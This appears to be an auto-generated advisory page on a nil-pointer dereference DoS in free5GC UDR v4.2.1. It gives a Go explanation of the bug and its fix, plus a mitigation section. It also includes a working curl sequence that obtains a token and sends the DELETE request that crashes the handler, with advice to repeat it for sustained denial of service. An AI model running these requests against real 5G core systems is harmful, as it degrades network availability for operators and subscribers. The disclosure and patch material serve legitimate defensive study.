How the CVE works
The flaw resides in the UDR’s `DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions` endpoint. To trigger it, an attacker first creates any EE subscription for a target ueId, which makes UDR allocate an in‑memory `UESubsData` map entry. Then, the attacker sends a valid authenticated DELETE request with a non‑existent subsId. Inside the vulnerable handler, the code checks:
```go
// Look up the requested subscription; on a miss, only an error object is prepared.
_, ok = UESubsData.EeSubscriptionCollection[subsId]
if !ok {
    pd = util.ProblemDetailsNotFound("SUBSCRIPTION_NOT_FOUND")
}
```
It correctly detects the missing subscription and sets a problem‑details error object. However, the function does not return after this error branch. Instead, execution continues to the next line:
```go
// Reached even when the lookup above failed: indexes the map again and dereferences the result.
if UESubsData.EeSubscriptionCollection[subsId].AmfSubscriptionInfos == nil {
```
Because `subsId` is absent, `UESubsData.EeSubscriptionCollection[subsId]` evaluates to a `nil` pointer. Dereferencing it to access `.AmfSubscriptionInfos` triggers a Go runtime panic: `runtime error: invalid memory address or nil pointer dereference`. The Gin web framework recovers the panic and returns an HTTP 500 error, but the endpoint can be made to panic again on every request. Repeating the request degrades UDR performance, causing a denial‑of‑service condition.
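The control-flow bug described above, reduced to a runnable Go example. This is an added illustration, not free5GC's own code: the types `UESubs`, `EeSubscription` and `AmfSubscriptionInfo` are simplified stand-ins with assumed shapes, the deferred `recover` stands in for Gin's recovery middleware, and the fixed variant applies the early `return` in the missing‑subscription branch.

```go
package main

import (
	"errors"
	"fmt"
)

// Simplified stand-ins for the UDR's in-memory types (assumed shapes, not free5GC's own).
type AmfSubscriptionInfo struct{ ID string }
type EeSubscription struct{ AmfSubscriptionInfos []AmfSubscriptionInfo }
type UESubs struct{ EeSubscriptionCollection map[string]*EeSubscription }

var ErrSubscriptionNotFound = errors.New("SUBSCRIPTION_NOT_FOUND")

// deleteAmfSubsVulnerable mirrors the bug: the not-found branch sets the error
// but does not return, so the next line dereferences a nil *EeSubscription.
func deleteAmfSubsVulnerable(ue *UESubs, subsId string) (err error) {
	defer func() { // stands in for Gin's recovery middleware (panic -> HTTP 500)
		if r := recover(); r != nil {
			err = fmt.Errorf("500 recovered panic: %v", r)
		}
	}()
	var pd error
	_, ok := ue.EeSubscriptionCollection[subsId]
	if !ok {
		pd = ErrSubscriptionNotFound // missing return here
	}
	if ue.EeSubscriptionCollection[subsId].AmfSubscriptionInfos == nil { // panics for a bad subsId
		return errors.New("AMF_SUBSCRIPTION_NOT_FOUND")
	}
	ue.EeSubscriptionCollection[subsId].AmfSubscriptionInfos = nil
	return pd
}

// deleteAmfSubsFixed returns early in the not-found branch, so the lookup
// result is only dereferenced when the subscription actually exists.
func deleteAmfSubsFixed(ue *UESubs, subsId string) error {
	sub, ok := ue.EeSubscriptionCollection[subsId]
	if !ok {
		return ErrSubscriptionNotFound // 404, no dereference
	}
	if sub.AmfSubscriptionInfos == nil {
		return errors.New("AMF_SUBSCRIPTION_NOT_FOUND")
	}
	sub.AmfSubscriptionInfos = nil
	return nil
}
```

A unit test that feeds a nonexistent `subsId` to the handler is the regression check to keep alongside the fix: the vulnerable form surfaces the recovered nil-pointer panic, the fixed form returns the not-found error.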
<h2 style="color: blue;">DailyCVE form</h2>
Platform: free5GC UDR
Version: v4.2.1
Vulnerability: Nil‑pointer dereference
Severity: Medium
Date: 2026‑05‑08
<h2 style="color: blue;">Prediction: 2026‑07‑15</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
```bash
# Restart UDR (clean state)
docker restart udr

# Obtain a valid nudr-dr token from NRF
curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'grant_type=client_credentials&nfType=NEF&nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57&targetNfType=UDR&scope=nudr-dr'

# Create one EE subscription to populate UESubsCollection for ueId=x
curl -i -sS -X POST \
  'http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/context-data/ee-subscriptions' \
  -H 'Authorization: Bearer <valid_nudr_dr_jwt>' \
  -H 'Content-Type: application/json' \
  --data '{}'

# Trigger the panic with a nonexistent subsId
curl -i -sS -X DELETE \
  'http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions' \
  -H 'Authorization: Bearer <valid_nudr_dr_jwt>'
```
Exploit:
Send one authenticated POST to `/ee-subscriptions` for any ueId, then send an authenticated DELETE to `/ee-subscriptions/{badSubsId}/amf-subscriptions` for the same ueId. The second request crashes the UDR goroutine (Gin recovers, but the endpoint remains panicable). Repeat to sustain a denial‑of‑service.
Protection from this CVE
Upgrade to a patched version that includes the fix from free5gc/udr60 (add a `return` statement in the missing‑subscription branch). Alternatively, apply the upstream patch that checks for nil before dereferencing, or deploy a reverse proxy that blocks DELETE requests targeting non‑existent subsId.
Impact
An authenticated attacker can reliably crash the UDR's data‑repository handler goroutine; each request costs CPU time and log writes. No confidentiality or persistence impact; only temporary availability degradation.
Sources:
Reported By: github.com